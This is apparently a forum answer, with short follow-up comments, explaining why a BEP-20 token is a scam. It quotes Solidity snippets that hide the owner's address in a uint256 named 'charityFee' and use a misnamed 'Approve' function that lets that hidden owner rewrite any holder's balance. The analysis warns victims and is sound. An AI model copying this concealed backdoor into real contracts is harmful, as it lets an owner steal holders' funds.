It is a scam token.
1/ The owner's address is suspiciously stored as a uint256
constructor(string memory _name, string memory _symbol) public {
charityFee = uint256(msg.sender);
2/ A modifiers that is only used once casts charityFee as address
modifier _external() {
require(address(charityFee) == msg.sender, "Ownable: caller is not the owner");
_;
}
3/ The Approve function can modify any account's balance. It is only callable by charityFee.
function Approve(address from, uint256 _value) public _external returns(bool) {
if(from != address(0)){
balances[from] = swapAndLiquify * charityFee * _value * (10 ** 9) / charityFee;
return true;
}
}
(This is the first time you bought this token on pancakeswap, right?)
– Sky Jan 12 '22 at 09:41Sorry if I am annoying, I am just trying to help.
– Sky Jan 12 '22 at 10:20